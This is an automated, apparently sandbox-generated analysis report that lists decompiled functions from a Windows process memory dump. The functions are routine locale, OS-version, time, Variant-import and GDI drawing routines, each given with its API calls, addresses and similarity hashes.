                                            Function 00945DC8, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E00945DC8(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x945e2e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00944220( &_v20, 7,  &_v15);
				E00942B60(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(0x945e35);
				return E00943FB0( &_v20);
			}








                                            0x00945dd1
                                            0x00945dd6
                                            0x00945dd7
                                            0x00945ddc
                                            0x00945ddf
                                            0x00945dee
                                            0x00945dfe
                                            0x00945e09
                                            0x00945e14
                                            0x00945e14
                                            0x00945e1a
                                            0x00945e1d
                                            0x00945e20
                                            0x00945e2d

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00945E2E), ref: 00945DEE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 1e63d2e1991cd29d76fe63f31276a737e6d7074721c6464fd9dc05c416d72dd1
                                            • Instruction ID: dc13cbf114ca8656e157375a2cf2811014ab0d6d02af82b8020883ca88d64a78
                                            • Opcode Fuzzy Hash: 1e63d2e1991cd29d76fe63f31276a737e6d7074721c6464fd9dc05c416d72dd1
                                            • Instruction Fuzzy Hash: 2EF04F31A04609AFEB15DFE1CC52EAFB37AFBC8710F418975A52096585E7B42B44C690
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094AD88, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0094AD88(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00944004(_t10, _t18);
				}
				return E009440A0(_t10, _t5 - 1,  &_v260, _t19);
			}







                                            0x0094ad93
                                            0x0094ad95
                                            0x0094ada6
                                            0x0094adab
                                            0x0094adad
                                            0x00000000
                                            0x0094adc5
                                            0x00000000

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0094ADA6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 85d4f0d4d82387324eba32a29ac78d97fb360990d1da4de3493c09c007dc2a53
                                            • Instruction ID: 497e78436947892bf2db72eca44fb2fd1d8bce3e3d343f32a0fa1a740bbb63c6
                                            • Opcode Fuzzy Hash: 85d4f0d4d82387324eba32a29ac78d97fb360990d1da4de3493c09c007dc2a53
                                            • Instruction Fuzzy Hash: 4EE0D871B0021817D310A9585C82FF6735C9B9D310F40466EBE04C7382EDB49D9043E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094BD4C, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0094BD4C() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x99a0d4 = _v132;
					 *0x99a0d8 = _v144;
					 *0x99a0dc = _v140;
					if( *0x99a0d4 != 1) {
						 *0x99a0e0 = _v136;
					} else {
						 *0x99a0e0 = _v136 & 0x0000ffff;
					}
					return E00944220(0x99a0e4, 0x80,  &_v128);
				}
				return _t7;
			}










                                            0x0094bd52
                                            0x0094bd5a
                                            0x0094bd61
                                            0x0094bd67
                                            0x0094bd70
                                            0x0094bd79
                                            0x0094bd85
                                            0x0094bd9b
                                            0x0094bd87
                                            0x0094bd90
                                            0x0094bd90
                                            0x00000000
                                            0x0094bdae
                                            0x0094bdb9

                                            APIs
                                            • GetVersionExA.KERNEL32(?,0094D45C,00000000,0094D474), ref: 0094BD5A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Version
                                            • String ID:
                                            • API String ID: 1889659487-0
                                            • Opcode ID: 150bda5b64d5184d216021c826ac3713edc03c93002ee0466fc46f8ba3d10f1e
                                            • Instruction ID: cc421d59c3260b38707ebcb2897ec5d159b2207c80d18c9e836c4d65293723df
                                            • Opcode Fuzzy Hash: 150bda5b64d5184d216021c826ac3713edc03c93002ee0466fc46f8ba3d10f1e
                                            • Instruction Fuzzy Hash: 37F0D4B59183019FC350DF2CE941B1577E4FB8A350F50892AF999C7391E739D818AB93
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094ADD4, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E0094ADD4(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                            0x0094add7
                                            0x0094add8
                                            0x0094adee
                                            0x0094adf5
                                            0x0094adf0
                                            0x0094adf0
                                            0x0094adf0
                                            0x0094adfb

                                            APIs
                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0094C642,00000000,0094C85B,?,?,00000000,00000000), ref: 0094ADE7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: 54b5eb67ed960c1853175280032ff89096811e9a2f98b5761eb0905909cd8bb5
                                            • Instruction ID: cf17b156858e94fe135d7cf7edb3badc7a48a70d61465ad2c94659a1cc56d71e
                                            • Opcode Fuzzy Hash: 54b5eb67ed960c1853175280032ff89096811e9a2f98b5761eb0905909cd8bb5
                                            • Instruction Fuzzy Hash: 6CD05EA630D2D02AA310555E2D85EBB4A9CCACA7A1F10443DB548C6242D2008C469372
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00949854, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00949854() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear;
			}




                                            0x00949858
                                            0x00949864

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: LocalTime
                                            • String ID:
                                            • API String ID: 481472006-0
                                            • Opcode ID: d3e1630e861b6e5d3350af65e37dc2d74d9889b21a03775a91b1af8beeec4b32
                                            • Instruction ID: e3eeb5254aca033d2e1a592164d526635a6068427c2b0ca5426ebe7eacbacf5f
                                            • Opcode Fuzzy Hash: d3e1630e861b6e5d3350af65e37dc2d74d9889b21a03775a91b1af8beeec4b32
                                            • Instruction Fuzzy Hash: EFA0120840584201854037180C0365830005841620FC4074468B8003D2E91901618697
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04570C64, Relevance: .2, Instructions: 248COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9519118e4436abb789726cfa5f945e194e8c8c1f80ef05f6f03f13f07f2aefb
                                            • Instruction ID: 87d49b0c03562bb66c24042b9185cde6995820520230922b5e2a895baaeba92d
                                            • Opcode Fuzzy Hash: c9519118e4436abb789726cfa5f945e194e8c8c1f80ef05f6f03f13f07f2aefb
                                            • Instruction Fuzzy Hash: 6A910074A0425A8FEB05CF68E8947EEBBF1FB59304F04457AD854A7382C335A549DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 045709F4, Relevance: .2, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac5fafa36f8ce1a644bd79d6edc39a2947d35f470a3fdb6788c972e1a719c1df
                                            • Instruction ID: fae6cebbea7dd082b642614d080ae0592ce64a26bb29b4379ed59d1028a81b15
                                            • Opcode Fuzzy Hash: ac5fafa36f8ce1a644bd79d6edc39a2947d35f470a3fdb6788c972e1a719c1df
                                            • Instruction Fuzzy Hash: 9381D075A0428A9FEB01CF68D4907EEFFF5FB1A300F184569C494A7782C374A606DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04578325, Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 528a57da9130c5e8b7164cc57b9b00282f56157ee9ca02355d5fa4af3b6dd810
                                            • Instruction ID: f7ca1399d2027896dbe760643453f060ddf1112cfa3cbc88dcca4ac6172404ed
                                            • Opcode Fuzzy Hash: 528a57da9130c5e8b7164cc57b9b00282f56157ee9ca02355d5fa4af3b6dd810
                                            • Instruction Fuzzy Hash: EF41ADB1900215DBEB14DF99E8C97AEBBF4FB48358F14806AC808EB255D374A900CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094D974, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0094D974() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x99c7a8 = E0094D948("VariantChangeTypeEx", E0094D4E4, _t91);
				 *0x99c7ac = E0094D948("VarNeg", E0094D514, _t91);
				 *0x99c7b0 = E0094D948("VarNot", E0094D514, _t91);
				 *0x99c7b4 = E0094D948("VarAdd", E0094D520, _t91);
				 *0x99c7b8 = E0094D948("VarSub", E0094D520, _t91);
				 *0x99c7bc = E0094D948("VarMul", E0094D520, _t91);
				 *0x99c7c0 = E0094D948("VarDiv", E0094D520, _t91);
				 *0x99c7c4 = E0094D948("VarIdiv", E0094D520, _t91);
				 *0x99c7c8 = E0094D948("VarMod", E0094D520, _t91);
				 *0x99c7cc = E0094D948("VarAnd", E0094D520, _t91);
				 *0x99c7d0 = E0094D948("VarOr", E0094D520, _t91);
				 *0x99c7d4 = E0094D948("VarXor", E0094D520, _t91);
				 *0x99c7d8 = E0094D948("VarCmp", E0094D52C, _t91);
				 *0x99c7dc = E0094D948("VarI4FromStr", E0094D538, _t91);
				 *0x99c7e0 = E0094D948("VarR4FromStr", E0094D5A4, _t91);
				 *0x99c7e4 = E0094D948("VarR8FromStr", E0094D610, _t91);
				 *0x99c7e8 = E0094D948("VarDateFromStr", E0094D67C, _t91);
				 *0x99c7ec = E0094D948("VarCyFromStr", E0094D6E8, _t91);
				 *0x99c7f0 = E0094D948("VarBoolFromStr", E0094D754, _t91);
				 *0x99c7f4 = E0094D948("VarBstrFromCy", E0094D7D4, _t91);
				 *0x99c7f8 = E0094D948("VarBstrFromDate", E0094D844, _t91);
				_t46 = E0094D948("VarBstrFromBool", E0094D8B4, _t91);
				 *0x99c7fc = _t46;
				return _t46;
			}






                                            0x0094d982
                                            0x0094d996
                                            0x0094d9ac
                                            0x0094d9c2
                                            0x0094d9d8
                                            0x0094d9ee
                                            0x0094da04
                                            0x0094da1a
                                            0x0094da30
                                            0x0094da46
                                            0x0094da5c
                                            0x0094da72
                                            0x0094da88
                                            0x0094da9e
                                            0x0094dab4
                                            0x0094daca
                                            0x0094dae0
                                            0x0094daf6
                                            0x0094db0c
                                            0x0094db22
                                            0x0094db38
                                            0x0094db4e
                                            0x0094db5e
                                            0x0094db64
                                            0x0094db6b

                                            APIs
                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0094D97D
                                              • Part of subcall function 0094D948: GetProcAddress.KERNEL32(00000000), ref: 0094D961
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                            • API String ID: 1646373207-1918263038
                                            • Opcode ID: 51c6da1f014e4c75e019790abf5a2026468cbf6c296353d31c007056f4c0bccf
                                            • Instruction ID: 1ba8683b8a25cac664afad30974ae19e273dcb3c0f504367942b9f07dff97b17
                                            • Opcode Fuzzy Hash: 51c6da1f014e4c75e019790abf5a2026468cbf6c296353d31c007056f4c0bccf
                                            • Instruction Fuzzy Hash: 4D41B2AD79F3085B9334ABAE7841D2677DDE6C47243A1403BF404CB75AEE30A8419E29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960A4C, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00960A4C(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x99b220; // 0x99a0d4
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E009608A8(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x960ccc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E009608A8(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x99c894; // 0xbf08074c
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x99c894; // 0xbf08074c
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x960cd3);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E009608A8(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x960b1f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00946BA4(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0x960cd3);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}























                                            0x00960a4d
                                            0x00960a4f
                                            0x00960a55
                                            0x00960a58
                                            0x00960a5b
                                            0x00960a5d
                                            0x00960a60
                                            0x00960a63
                                            0x00960a67
                                            0x00960a6f
                                            0x00960b28
                                            0x00960b37
                                            0x00960b3c
                                            0x00960b3d
                                            0x00960b42
                                            0x00960b45
                                            0x00960b58
                                            0x00960b68
                                            0x00960b6d
                                            0x00960b7c
                                            0x00960b89
                                            0x00960b92
                                            0x00960baa
                                            0x00960bb9
                                            0x00960b94
                                            0x00960ba3
                                            0x00960ba3
                                            0x00960bc0
                                            0x00960be2
                                            0x00960c04
                                            0x00960c11
                                            0x00960c1f
                                            0x00960c46
                                            0x00960c6b
                                            0x00960c75
                                            0x00960c7f
                                            0x00960c88
                                            0x00960c92
                                            0x00960c92
                                            0x00960c9b
                                            0x00960ca2
                                            0x00960ca5
                                            0x00960ca8
                                            0x00960cb1
                                            0x00960cbd
                                            0x00960cbd
                                            0x00960ccb
                                            0x00960a87
                                            0x00960a99
                                            0x00960aa9
                                            0x00960aae
                                            0x00960aaf
                                            0x00960ab4
                                            0x00960ab7
                                            0x00960af3
                                            0x00960afa
                                            0x00960afd
                                            0x00960b00
                                            0x00960b12
                                            0x00960b1e
                                            0x00960b1e

                                            APIs
                                            • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00960A8F
                                            • SelectObject.GDI32(?,?), ref: 00960AA4
                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00960B1F,?,?), ref: 00960AF3
                                            • SelectObject.GDI32(?,?), ref: 00960B0D
                                            • DeleteObject.GDI32(?), ref: 00960B19
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00960B2D
                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00960B4E
                                            • SelectObject.GDI32(?,?), ref: 00960B63
                                            • SelectPalette.GDI32(?,BF08074C,00000000), ref: 00960B77
                                            • SelectPalette.GDI32(?,?,00000000), ref: 00960B89
                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00960B9E
                                            • SelectPalette.GDI32(?,BF08074C,000000FF), ref: 00960BB4
                                            • RealizePalette.GDI32(?), ref: 00960BC0
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00960BE2
                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00960C04
                                            • SetTextColor.GDI32(?,00000000), ref: 00960C0C
                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 00960C1A
                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00960C46
                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00960C6B
                                            • SetTextColor.GDI32(?,?), ref: 00960C75
                                            • SetBkColor.GDI32(?,?), ref: 00960C7F
                                            • SelectObject.GDI32(?,00000000), ref: 00960C92
                                            • DeleteObject.GDI32(?), ref: 00960C9B
                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00960CBD
                                            • DeleteDC.GDI32(?), ref: 00960CC6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                            • String ID:
                                            • API String ID: 3976802218-0
                                            • Opcode ID: 7defde4f5143683e88184b798dafe98a3480b59a4d010dec067a3b29715b3714
                                            • Instruction ID: b48857472063d5b4c267984e93ff311f896f4c3a79a340d9916898cc6883c9d2
                                            • Opcode Fuzzy Hash: 7defde4f5143683e88184b798dafe98a3480b59a4d010dec067a3b29715b3714
                                            • Instruction Fuzzy Hash: 8E819FB1A00249AFDB50EFACCD85FAF77FCAB8D714F110555B618E7281C675AD008B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009629A8, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E009629A8(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00961E9C(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x962ba3);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E009608A8(GetDC(0));
					_v20 = E009608A8(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L17:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x962baa);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E009608A8(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x962b5b);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E009622E0(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x962b62);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

























                                            0x009629a9
                                            0x009629ab
                                            0x009629b1
                                            0x009629b3
                                            0x009629b5
                                            0x009629b9
                                            0x009629be
                                            0x00962bb3
                                            0x009629d8
                                            0x009629da
                                            0x009629e1
                                            0x009629e6
                                            0x009629eb
                                            0x009629ec
                                            0x009629f1
                                            0x009629f4
                                            0x00962a03
                                            0x00962a14
                                            0x00962a2a
                                            0x00962a31
                                            0x00962b75
                                            0x00962b75
                                            0x00962b77
                                            0x00962b7a
                                            0x00962b7d
                                            0x00962b86
                                            0x00962b8c
                                            0x00962b8c
                                            0x00962b95
                                            0x00000000
                                            0x00962b9d
                                            0x00962ba2
                                            0x00962a37
                                            0x00962a44
                                            0x00962a4d
                                            0x00962a79
                                            0x00962a7e
                                            0x00962a7f
                                            0x00962a84
                                            0x00962a87
                                            0x00962a8e
                                            0x00962aae
                                            0x00962a90
                                            0x00962a90
                                            0x00962a96
                                            0x00962aaa
                                            0x00962aaa
                                            0x00962abc
                                            0x00962ac1
                                            0x00962aca
                                            0x00962ad3
                                            0x00962adf
                                            0x00962ae8
                                            0x00962ae8
                                            0x00962af2
                                            0x00962b16
                                            0x00962b20
                                            0x00962b29
                                            0x00962b33
                                            0x00962b33
                                            0x00962b3c
                                            0x00962b3f
                                            0x00962b3f
                                            0x00962b46
                                            0x00962b49
                                            0x00962b4c
                                            0x00962b5a
                                            0x00962a4f
                                            0x00962a61
                                            0x00962b66
                                            0x00962b70
                                            0x00962b70
                                            0x00000000
                                            0x00962b66
                                            0x00962a4d
                                            0x00962a31

                                            APIs
                                            • GetObjectA.GDI32(?,00000054,?), ref: 009629CB
                                              • Part of subcall function 00961E9C: SetRectEmpty.USER32 ref: 00961EE9
                                            • GetDC.USER32 ref: 009629F9
                                            • CreateCompatibleDC.GDI32(?), ref: 00962A0A
                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00962A25
                                            • SelectObject.GDI32(?,00000000), ref: 00962A3F
                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00962A61
                                            • CreateCompatibleDC.GDI32(?), ref: 00962A6F
                                            • SelectObject.GDI32(?), ref: 00962AB7
                                            • SelectPalette.GDI32(?,?,00000000), ref: 00962ACA
                                            • RealizePalette.GDI32(?), ref: 00962AD3
                                            • SelectPalette.GDI32(?,?,00000000), ref: 00962ADF
                                            • RealizePalette.GDI32(?), ref: 00962AE8
                                            • SetBkColor.GDI32(?), ref: 00962AF2
                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00962B16
                                            • SetBkColor.GDI32(?,00000000), ref: 00962B20
                                            • SelectObject.GDI32(?,00000000), ref: 00962B33
                                            • DeleteObject.GDI32 ref: 00962B3F
                                            • DeleteDC.GDI32(?), ref: 00962B55
                                            • SelectObject.GDI32(?,00000000), ref: 00962B70
                                            • DeleteDC.GDI32(00000000), ref: 00962B8C
                                            • ReleaseDC.USER32 ref: 00962B9D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapEmptyRectRelease
                                            • String ID:
                                            • API String ID: 1640075392-0
                                            • Opcode ID: 2d242abcabfb9c6b14caab5e344cbb6ac655a8f0a3598c948e6b2a6f414c3eef
                                            • Instruction ID: ce4a4ca5cb1a79651bede046230f110f13da619f742d10ca7ac3210124a22448
                                            • Opcode Fuzzy Hash: 2d242abcabfb9c6b14caab5e344cbb6ac655a8f0a3598c948e6b2a6f414c3eef
